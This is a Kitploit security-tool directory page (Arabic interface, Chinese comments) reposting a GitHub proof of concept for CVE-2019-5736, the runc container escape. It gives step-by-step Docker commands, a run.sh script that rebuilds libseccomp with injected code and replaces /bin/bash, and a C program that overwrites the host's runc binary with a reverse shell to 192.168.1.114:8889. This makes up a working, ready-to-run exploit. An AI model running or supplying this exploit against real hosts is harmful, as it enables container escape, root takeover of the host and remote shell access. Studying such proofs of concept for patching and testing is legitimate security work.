Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-5736 | Kitploit
أدوات/GitHubGitHub/si1ent-le/cve-2019-5736
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالفريق الأحمرالهروب من الحاويةاستغلال الملفات الثنائية
GitHubsi1ent-le/cve-2019-5736

CVE-2019-5736

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-5736

المرجع: cve-2019-5736-poc

  • (1). تعديل أمر الـ POC في stage2.cve
  • (2). بناء صورة Docker: docker build -t cve .
  • (3). تشغيل الحاوية: docker run -d cve /bin/bash -c "tail -f /dev/null"
  • (4). عمل نسخة احتياطية من docker-runc: cp /usr/bin/docker-runc /usr/bin/docker-runc.bak
  • (5). docker exec -it docker-id /bin/bash
  • (6). تعديل إصدار libseccomp في run.sh مثال: cd /root/libseccomp-2.5.1
  • (7). داخل الحاوية قم بتشغيل: cd /root && ./run.sh && exit
  • (8). docker exec -it docker-id /bin/bash

التعديلات

run.sh

root@kitploit:~
#!/bin/bash
# libseccomp版本及时关注容器创建后/root目录下下载的对应版本信息
cd /root/libseccomp-2.5.1
cat /root/stage1.c >> src/api.c
DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us
dpkg -i /root/*.deb
mv /bin/bash /bin/good_bash
gcc /root/stage2.c -o /stage2
cat >/bin/bash <<EOF
#!/proc/self/exe
EOF
chmod +x /bin/bash

التطبيق العملي

البيئة

root@kitploit:~
宿主机:Ubuntu18.04
Docker-ce:18.06.1~ce~3-0~ubuntu
docker-runc:1.0

نشر البيئة

root@kitploit:~
sudo apt-get update
sudo apt-get install apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu
# 如出错,cd /var/lib/dpkg/updates删除目录下的所有文件再执行以上
root@root:~# sudo apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

تعديل ملف C

stage2.c

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>

int main(int argc, char **argv) {

    printf("HAX2: argv: %s\n", argv[1]);
    int res1 = -1;
    int total = 10000;
    while(total>0 && res1== -1){

        int fd = open(argv[1], O_RDWR|O_TRUNC);
        printf("HAX2: fd: %d\n", fd);

        const char *poc = "#!/bin/bash\n/bin/bash -i >& /dev/tcp/192.168.1.114/8889 0>&1  &\n";
        int res = write(fd, poc, strlen(poc));
        printf("HAX2: res: %d, %d\n", res, errno);
        res1 = res;
        total--;
    }
}

بناء الصورة

root@kitploit:~
docker build -t cve-2019-5736 .

image

التشغيل

root@kitploit:~
docker run -d cve-2019-5736 /bin/bash -c "tail -f /dev/null"

image

النسخ الاحتياطي لـ docker-runc على المضيف

لأنه سيتم لاحقًا استبدال ملف docker-runc الموجود في النظام

root@kitploit:~
cp /usr/bin/docker-runc /usr/bin/docker-runc.bak

تسجيل الدخول إلى الحاوية

root@kitploit:~
docker exec -it 655378598a92 /bin/bash

التنفيذ داخل الحاوية

root@kitploit:~
# 备注:及时修改run.sh文件中libseccomp版本信息再执行
cd /root 
./run.sh
exit

إعادة الاتصال بالحاوية

root@kitploit:~
# docker exec -it 655378598a92 /bin/bash
# 此时nc监听会收到一个反弹宿主机的shell

image

تنزيل الأداة